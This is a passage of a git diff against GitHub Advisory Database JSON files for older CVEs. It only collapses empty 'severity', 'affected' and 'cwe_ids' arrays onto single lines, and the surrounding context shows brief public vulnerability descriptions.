- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-jh7x-q8r2-8mh3/GHSA-jh7x-q8r2-8mh3.json b/advisories/unreviewed/2022/05/GHSA-jh7x-q8r2-8mh3/GHSA-jh7x-q8r2-8mh3.json
index a8aec406b59..6451a2b0f7e 100644
--- a/advisories/unreviewed/2022/05/GHSA-jh7x-q8r2-8mh3/GHSA-jh7x-q8r2-8mh3.json
+++ b/advisories/unreviewed/2022/05/GHSA-jh7x-q8r2-8mh3/GHSA-jh7x-q8r2-8mh3.json
@@ -7,12 +7,8 @@
"CVE-2014-4719"
],
"details": "Cross-site scripting (XSS) vulnerability in the login panel (svn/login/) in User-Friendly SVN (aka USVN) before 1.0.7 allows remote attackers to inject arbitrary web script or HTML via the username field.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-jhhq-6jp7-v587/GHSA-jhhq-6jp7-v587.json b/advisories/unreviewed/2022/05/GHSA-jhhq-6jp7-v587/GHSA-jhhq-6jp7-v587.json
index 912f7bc2446..808c5f92dd4 100644
--- a/advisories/unreviewed/2022/05/GHSA-jhhq-6jp7-v587/GHSA-jhhq-6jp7-v587.json
+++ b/advisories/unreviewed/2022/05/GHSA-jhhq-6jp7-v587/GHSA-jhhq-6jp7-v587.json
@@ -7,12 +7,8 @@
"CVE-2014-4600"
],
"details": "Multiple cross-site scripting (XSS) vulnerabilities in contact/edit.php in the WP Ultimate Email Marketer plugin 1.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) listname or (2) contact parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json b/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json
index ff608ea5b17..a17570f5955 100644
--- a/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json
+++ b/advisories/unreviewed/2022/05/GHSA-jhxw-fqxp-j75j/GHSA-jhxw-fqxp-j75j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-jjgp-6pj9-6629/GHSA-jjgp-6pj9-6629.json b/advisories/unreviewed/2022/05/GHSA-jjgp-6pj9-6629/GHSA-jjgp-6pj9-6629.json
index 86b169f7f53..18d557fb3d5 100644
--- a/advisories/unreviewed/2022/05/GHSA-jjgp-6pj9-6629/GHSA-jjgp-6pj9-6629.json
+++ b/advisories/unreviewed/2022/05/GHSA-jjgp-6pj9-6629/GHSA-jjgp-6pj9-6629.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-jm4h-7jwg-289v/GHSA-jm4h-7jwg-289v.json b/advisories/unreviewed/2022/05/GHSA-jm4h-7jwg-289v/GHSA-jm4h-7jwg-289v.json
index 9bd537fa989..3443fce1955 100644
--- a/advisories/unreviewed/2022/05/GHSA-jm4h-7jwg-289v/GHSA-jm4h-7jwg-289v.json
+++ b/advisories/unreviewed/2022/05/GHSA-jm4h-7jwg-289v/GHSA-jm4h-7jwg-289v.json
@@ -7,12 +7,8 @@
"CVE-2014-0184"
],
"details": "Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 logs the root password when deploying a VM, which allows local users to obtain sensitive information by reading the evm.log file.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-jp7x-46gh-r5cx/GHSA-jp7x-46gh-r5cx.json b/advisories/unreviewed/2022/05/GHSA-jp7x-46gh-r5cx/GHSA-jp7x-46gh-r5cx.json
index bf71a376e5a..f38a2c48991 100644
--- a/advisories/unreviewed/2022/05/GHSA-jp7x-46gh-r5cx/GHSA-jp7x-46gh-r5cx.json
+++ b/advisories/unreviewed/2022/05/GHSA-jp7x-46gh-r5cx/GHSA-jp7x-46gh-r5cx.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-jpp9-9j52-jc5j/GHSA-jpp9-9j52-jc5j.json b/advisories/unreviewed/2022/05/GHSA-jpp9-9j52-jc5j/GHSA-jpp9-9j52-jc5j.json
index 41be4d30d29..ba38dad36ad 100644
--- a/advisories/unreviewed/2022/05/GHSA-jpp9-9j52-jc5j/GHSA-jpp9-9j52-jc5j.json
+++ b/advisories/unreviewed/2022/05/GHSA-jpp9-9j52-jc5j/GHSA-jpp9-9j52-jc5j.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-jq93-4v6x-g5r7/GHSA-jq93-4v6x-g5r7.json b/advisories/unreviewed/2022/05/GHSA-jq93-4v6x-g5r7/GHSA-jq93-4v6x-g5r7.json
index 8d60cab8201..dc644025176 100644
--- a/advisories/unreviewed/2022/05/GHSA-jq93-4v6x-g5r7/GHSA-jq93-4v6x-g5r7.json
+++ b/advisories/unreviewed/2022/05/GHSA-jq93-4v6x-g5r7/GHSA-jq93-4v6x-g5r7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-jr4h-hc9r-9rr3/GHSA-jr4h-hc9r-9rr3.json b/advisories/unreviewed/2022/05/GHSA-jr4h-hc9r-9rr3/GHSA-jr4h-hc9r-9rr3.json
index 7b4d6318178..64df968b483 100644
--- a/advisories/unreviewed/2022/05/GHSA-jr4h-hc9r-9rr3/GHSA-jr4h-hc9r-9rr3.json
+++ b/advisories/unreviewed/2022/05/GHSA-jr4h-hc9r-9rr3/GHSA-jr4h-hc9r-9rr3.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-jvq5-2pr5-vc2v/GHSA-jvq5-2pr5-vc2v.json b/advisories/unreviewed/2022/05/GHSA-jvq5-2pr5-vc2v/GHSA-jvq5-2pr5-vc2v.json
index 42d64f4d1e7..765b773becd 100644
--- a/advisories/unreviewed/2022/05/GHSA-jvq5-2pr5-vc2v/GHSA-jvq5-2pr5-vc2v.json
+++ b/advisories/unreviewed/2022/05/GHSA-jvq5-2pr5-vc2v/GHSA-jvq5-2pr5-vc2v.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-jx7p-hhc6-v2pg/GHSA-jx7p-hhc6-v2pg.json b/advisories/unreviewed/2022/05/GHSA-jx7p-hhc6-v2pg/GHSA-jx7p-hhc6-v2pg.json
index a0e4e033ae3..2a2489276da 100644
--- a/advisories/unreviewed/2022/05/GHSA-jx7p-hhc6-v2pg/GHSA-jx7p-hhc6-v2pg.json
+++ b/advisories/unreviewed/2022/05/GHSA-jx7p-hhc6-v2pg/GHSA-jx7p-hhc6-v2pg.json
@@ -7,12 +7,8 @@
"CVE-2013-5756"
],
"details": "Directory traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a .. (dot dot) in the page parameter to cgi-bin/cgiServer.exx.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-jxcq-r9pr-gvg5/GHSA-jxcq-r9pr-gvg5.json b/advisories/unreviewed/2022/05/GHSA-jxcq-r9pr-gvg5/GHSA-jxcq-r9pr-gvg5.json
index 8f8d7299dc3..47e255d0c06 100644
--- a/advisories/unreviewed/2022/05/GHSA-jxcq-r9pr-gvg5/GHSA-jxcq-r9pr-gvg5.json
+++ b/advisories/unreviewed/2022/05/GHSA-jxcq-r9pr-gvg5/GHSA-jxcq-r9pr-gvg5.json
@@ -7,12 +7,8 @@
"CVE-2012-6653"
],
"details": "Unspecified vulnerability in the All Video Gallery (all-video-gallery) plugin before 1.2.0 for WordPress has unspecified impact and attack vectors.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -24,9 +20,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-jxg9-82mv-rx2r/GHSA-jxg9-82mv-rx2r.json b/advisories/unreviewed/2022/05/GHSA-jxg9-82mv-rx2r/GHSA-jxg9-82mv-rx2r.json
index dba0243ba62..986e676b68e 100644
--- a/advisories/unreviewed/2022/05/GHSA-jxg9-82mv-rx2r/GHSA-jxg9-82mv-rx2r.json
+++ b/advisories/unreviewed/2022/05/GHSA-jxg9-82mv-rx2r/GHSA-jxg9-82mv-rx2r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-m25v-4656-g8pc/GHSA-m25v-4656-g8pc.json b/advisories/unreviewed/2022/05/GHSA-m25v-4656-g8pc/GHSA-m25v-4656-g8pc.json
index 5744d95e7e1..19565aab102 100644
--- a/advisories/unreviewed/2022/05/GHSA-m25v-4656-g8pc/GHSA-m25v-4656-g8pc.json
+++ b/advisories/unreviewed/2022/05/GHSA-m25v-4656-g8pc/GHSA-m25v-4656-g8pc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-m2h9-c2v8-hj79/GHSA-m2h9-c2v8-hj79.json b/advisories/unreviewed/2022/05/GHSA-m2h9-c2v8-hj79/GHSA-m2h9-c2v8-hj79.json
index 0be1e2c7517..326377ce820 100644
--- a/advisories/unreviewed/2022/05/GHSA-m2h9-c2v8-hj79/GHSA-m2h9-c2v8-hj79.json
+++ b/advisories/unreviewed/2022/05/GHSA-m2h9-c2v8-hj79/GHSA-m2h9-c2v8-hj79.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-m3r4-hcc8-8q6r/GHSA-m3r4-hcc8-8q6r.json b/advisories/unreviewed/2022/05/GHSA-m3r4-hcc8-8q6r/GHSA-m3r4-hcc8-8q6r.json
index 3459136366a..e733ea3441a 100644
--- a/advisories/unreviewed/2022/05/GHSA-m3r4-hcc8-8q6r/GHSA-m3r4-hcc8-8q6r.json
+++ b/advisories/unreviewed/2022/05/GHSA-m3r4-hcc8-8q6r/GHSA-m3r4-hcc8-8q6r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-m46m-7gj5-vvwm/GHSA-m46m-7gj5-vvwm.json b/advisories/unreviewed/2022/05/GHSA-m46m-7gj5-vvwm/GHSA-m46m-7gj5-vvwm.json
index 8154f5d37ab..596456a96ce 100644
--- a/advisories/unreviewed/2022/05/GHSA-m46m-7gj5-vvwm/GHSA-m46m-7gj5-vvwm.json
+++ b/advisories/unreviewed/2022/05/GHSA-m46m-7gj5-vvwm/GHSA-m46m-7gj5-vvwm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-m543-3mp9-rfgf/GHSA-m543-3mp9-rfgf.json b/advisories/unreviewed/2022/05/GHSA-m543-3mp9-rfgf/GHSA-m543-3mp9-rfgf.json
index f3a26ca61f0..ad2870845a8 100644
--- a/advisories/unreviewed/2022/05/GHSA-m543-3mp9-rfgf/GHSA-m543-3mp9-rfgf.json
+++ b/advisories/unreviewed/2022/05/GHSA-m543-3mp9-rfgf/GHSA-m543-3mp9-rfgf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-m57f-pffq-7g3c/GHSA-m57f-pffq-7g3c.json b/advisories/unreviewed/2022/05/GHSA-m57f-pffq-7g3c/GHSA-m57f-pffq-7g3c.json
index 51df2835333..ed4dbe50bfc 100644
--- a/advisories/unreviewed/2022/05/GHSA-m57f-pffq-7g3c/GHSA-m57f-pffq-7g3c.json
+++ b/advisories/unreviewed/2022/05/GHSA-m57f-pffq-7g3c/GHSA-m57f-pffq-7g3c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-m5j6-8c2h-w4h7/GHSA-m5j6-8c2h-w4h7.json b/advisories/unreviewed/2022/05/GHSA-m5j6-8c2h-w4h7/GHSA-m5j6-8c2h-w4h7.json
index 19514e6e537..16789128751 100644
--- a/advisories/unreviewed/2022/05/GHSA-m5j6-8c2h-w4h7/GHSA-m5j6-8c2h-w4h7.json
+++ b/advisories/unreviewed/2022/05/GHSA-m5j6-8c2h-w4h7/GHSA-m5j6-8c2h-w4h7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-m5rx-hc2h-rx36/GHSA-m5rx-hc2h-rx36.json b/advisories/unreviewed/2022/05/GHSA-m5rx-hc2h-rx36/GHSA-m5rx-hc2h-rx36.json
index 72a025f6bc0..cc1cb4e8f0b 100644
--- a/advisories/unreviewed/2022/05/GHSA-m5rx-hc2h-rx36/GHSA-m5rx-hc2h-rx36.json
+++ b/advisories/unreviewed/2022/05/GHSA-m5rx-hc2h-rx36/GHSA-m5rx-hc2h-rx36.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-m5w3-m6g8-4mhf/GHSA-m5w3-m6g8-4mhf.json b/advisories/unreviewed/2022/05/GHSA-m5w3-m6g8-4mhf/GHSA-m5w3-m6g8-4mhf.json
index 1b740bb7133..64a9206e98d 100644
--- a/advisories/unreviewed/2022/05/GHSA-m5w3-m6g8-4mhf/GHSA-m5w3-m6g8-4mhf.json
+++ b/advisories/unreviewed/2022/05/GHSA-m5w3-m6g8-4mhf/GHSA-m5w3-m6g8-4mhf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-m879-9xpq-ppwc/GHSA-m879-9xpq-ppwc.json b/advisories/unreviewed/2022/05/GHSA-m879-9xpq-ppwc/GHSA-m879-9xpq-ppwc.json
index 42c3e385623..ad646275ccd 100644
--- a/advisories/unreviewed/2022/05/GHSA-m879-9xpq-ppwc/GHSA-m879-9xpq-ppwc.json
+++ b/advisories/unreviewed/2022/05/GHSA-m879-9xpq-ppwc/GHSA-m879-9xpq-ppwc.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-m8c4-28p9-4w47/GHSA-m8c4-28p9-4w47.json b/advisories/unreviewed/2022/05/GHSA-m8c4-28p9-4w47/GHSA-m8c4-28p9-4w47.json
index 6c1593f2dd3..b557c1558be 100644
--- a/advisories/unreviewed/2022/05/GHSA-m8c4-28p9-4w47/GHSA-m8c4-28p9-4w47.json
+++ b/advisories/unreviewed/2022/05/GHSA-m8c4-28p9-4w47/GHSA-m8c4-28p9-4w47.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-m8qh-34qf-f2mq/GHSA-m8qh-34qf-f2mq.json b/advisories/unreviewed/2022/05/GHSA-m8qh-34qf-f2mq/GHSA-m8qh-34qf-f2mq.json
index 87badf68734..b0be71aa385 100644
--- a/advisories/unreviewed/2022/05/GHSA-m8qh-34qf-f2mq/GHSA-m8qh-34qf-f2mq.json
+++ b/advisories/unreviewed/2022/05/GHSA-m8qh-34qf-f2mq/GHSA-m8qh-34qf-f2mq.json
@@ -7,12 +7,8 @@
"CVE-2014-4154"
],
"details": "ZTE ZXV10 W300 router with firmware W300V1.0.0a_ZRD_LK stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the PPPoE/PPPoA password via a direct request for basic/tc2wanfun.js.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -32,9 +28,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json b/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json
index 0d9f9c0f4f9..a2d793948b6 100644
--- a/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json
+++ b/advisories/unreviewed/2022/05/GHSA-m9m5-q9x5-6877/GHSA-m9m5-q9x5-6877.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-mc72-rv83-h28w/GHSA-mc72-rv83-h28w.json b/advisories/unreviewed/2022/05/GHSA-mc72-rv83-h28w/GHSA-mc72-rv83-h28w.json
index c20bb3c789b..534d864a5b9 100644
--- a/advisories/unreviewed/2022/05/GHSA-mc72-rv83-h28w/GHSA-mc72-rv83-h28w.json
+++ b/advisories/unreviewed/2022/05/GHSA-mc72-rv83-h28w/GHSA-mc72-rv83-h28w.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-mcjh-hgj8-rxf6/GHSA-mcjh-hgj8-rxf6.json b/advisories/unreviewed/2022/05/GHSA-mcjh-hgj8-rxf6/GHSA-mcjh-hgj8-rxf6.json
index a753dda90cc..e9490c21e14 100644
--- a/advisories/unreviewed/2022/05/GHSA-mcjh-hgj8-rxf6/GHSA-mcjh-hgj8-rxf6.json
+++ b/advisories/unreviewed/2022/05/GHSA-mcjh-hgj8-rxf6/GHSA-mcjh-hgj8-rxf6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-mfj7-24mx-p6qj/GHSA-mfj7-24mx-p6qj.json b/advisories/unreviewed/2022/05/GHSA-mfj7-24mx-p6qj/GHSA-mfj7-24mx-p6qj.json
index 46da13e8147..9d65d35394b 100644
--- a/advisories/unreviewed/2022/05/GHSA-mfj7-24mx-p6qj/GHSA-mfj7-24mx-p6qj.json
+++ b/advisories/unreviewed/2022/05/GHSA-mfj7-24mx-p6qj/GHSA-mfj7-24mx-p6qj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-mfx6-3x7c-57wf/GHSA-mfx6-3x7c-57wf.json b/advisories/unreviewed/2022/05/GHSA-mfx6-3x7c-57wf/GHSA-mfx6-3x7c-57wf.json
index f091393884c..70b4486dfb6 100644
--- a/advisories/unreviewed/2022/05/GHSA-mfx6-3x7c-57wf/GHSA-mfx6-3x7c-57wf.json
+++ b/advisories/unreviewed/2022/05/GHSA-mfx6-3x7c-57wf/GHSA-mfx6-3x7c-57wf.json
@@ -7,12 +7,8 @@
"CVE-2011-2514"
],
"details": "The Java Network Launching Protocol (JNLP) implementation in IcedTea6 1.9.x before 1.9.9 and before 1.8.9, and IcedTea-Web 1.1.x before 1.1.1 and before 1.0.4, allows remote attackers to trick victims into granting access to local files by modifying the content of the Java Web Start Security Warning dialog box to represent a different filename than the file for which access will be granted.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -52,9 +48,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-mg45-vhfv-wcj4/GHSA-mg45-vhfv-wcj4.json b/advisories/unreviewed/2022/05/GHSA-mg45-vhfv-wcj4/GHSA-mg45-vhfv-wcj4.json
index df547d9d44e..232ce54b46d 100644
--- a/advisories/unreviewed/2022/05/GHSA-mg45-vhfv-wcj4/GHSA-mg45-vhfv-wcj4.json
+++ b/advisories/unreviewed/2022/05/GHSA-mg45-vhfv-wcj4/GHSA-mg45-vhfv-wcj4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-mh5v-7j2w-5pmh/GHSA-mh5v-7j2w-5pmh.json b/advisories/unreviewed/2022/05/GHSA-mh5v-7j2w-5pmh/GHSA-mh5v-7j2w-5pmh.json
index b68bb1c5dbe..c94797f9a7d 100644
--- a/advisories/unreviewed/2022/05/GHSA-mh5v-7j2w-5pmh/GHSA-mh5v-7j2w-5pmh.json
+++ b/advisories/unreviewed/2022/05/GHSA-mh5v-7j2w-5pmh/GHSA-mh5v-7j2w-5pmh.json
@@ -7,12 +7,8 @@
"CVE-2014-3777"
],
"details": "Directory traversal vulnerability in Reportico PHP Report Designer before 4.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the xmlin parameter.",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-mhrh-8vw7-3jjr/GHSA-mhrh-8vw7-3jjr.json b/advisories/unreviewed/2022/05/GHSA-mhrh-8vw7-3jjr/GHSA-mhrh-8vw7-3jjr.json
index 0c7b4e194ee..cd939e11ecb 100644
--- a/advisories/unreviewed/2022/05/GHSA-mhrh-8vw7-3jjr/GHSA-mhrh-8vw7-3jjr.json
+++ b/advisories/unreviewed/2022/05/GHSA-mhrh-8vw7-3jjr/GHSA-mhrh-8vw7-3jjr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-mj9p-gcpr-r3x5/GHSA-mj9p-gcpr-r3x5.json b/advisories/unreviewed/2022/05/GHSA-mj9p-gcpr-r3x5/GHSA-mj9p-gcpr-r3x5.json
index 412b57d9e99..ed789408b8b 100644
--- a/advisories/unreviewed/2022/05/GHSA-mj9p-gcpr-r3x5/GHSA-mj9p-gcpr-r3x5.json
+++ b/advisories/unreviewed/2022/05/GHSA-mj9p-gcpr-r3x5/GHSA-mj9p-gcpr-r3x5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2022/05/GHSA-mjc4-qpgx-fg5c/GHSA-mjc4-qpgx-fg5c.json b/advisories/unreviewed/2022/05/GHSA-mjc4-qpgx-fg5c/GHSA-mjc4-qpgx-fg5c.json
index 22306d7e78a..b71dbdf5c36 100644
--- a/advisories/unreviewed/2022/05/GHSA-mjc4-qpgx-fg5c/GHSA-mjc4-qpgx-fg5c.json
+++ b/advisories/unreviewed/2022/05/GHSA-mjc4-qpgx-fg5c/GHSA-mjc4-qpgx-fg5c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2022/05/GHSA-mjvf-7qj2-wj4q/GHSA-mjvf-7qj2-wj4q.json b/advisories/unreviewed/2022/05/GHSA-mjvf-7qj2-wj4q/GHSA-mjvf-7qj2-wj4q.json
index a4d5b5a5749..a9c8872789d 100644
--- a/advisories/unreviewed/2022/05/GHSA-mjvf-7qj2-wj4q/GHSA-mjvf-7qj2-wj4q.json
+++ b/advisories/unreviewed/2022/05/GHSA-mjvf-7qj2-wj4q/GHSA-mjvf-7qj2-wj4q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -27,9 +25,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
